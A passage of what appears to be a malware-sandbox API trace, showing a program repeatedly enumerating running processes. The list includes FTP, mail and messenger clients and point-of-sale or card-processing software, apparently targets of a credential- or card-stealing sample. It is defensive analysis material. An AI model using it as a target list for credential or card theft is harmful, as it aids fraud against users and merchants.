szExeFile="love gas.exe")) returned 1 [0195.565] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0195.568] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0195.570] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0195.572] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0195.574] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0195.576] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0195.578] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0195.581] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0195.583] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0195.585] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0195.588] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0195.590] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0195.593] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0195.595] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0195.649] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0195.654] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0195.656] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0195.658] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0195.663] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0195.683] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0195.686] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0195.689] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0195.692] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0195.694] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0195.696] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0195.699] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0195.701] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0195.757] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0195.760] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0195.762] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0195.764] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0195.766] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0195.768] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0195.770] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0195.772] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0195.775] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0195.777] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0195.780] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0195.783] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0195.786] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0195.789] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0195.791] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0195.848] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0195.851] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0195.854] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0195.856] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0195.859] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0195.861] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0195.864] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0195.867] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0195.870] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0195.872] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0195.874] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0195.877] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0195.879] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0195.882] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0195.937] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0195.939] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0195.941] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0195.943] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0195.946] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0195.948] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0195.949] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.951] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0195.953] CloseHandle (hObject=0x18f0) returned 1 [0195.953] Sleep (dwMilliseconds=0x64) [0196.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f0 [0196.206] Process32First (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.208] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.210] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.212] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.214] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.216] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.217] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.219] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.221] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.222] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.225] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.298] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.300] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.355] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.358] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.360] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.363] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.365] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.370] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.373] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, 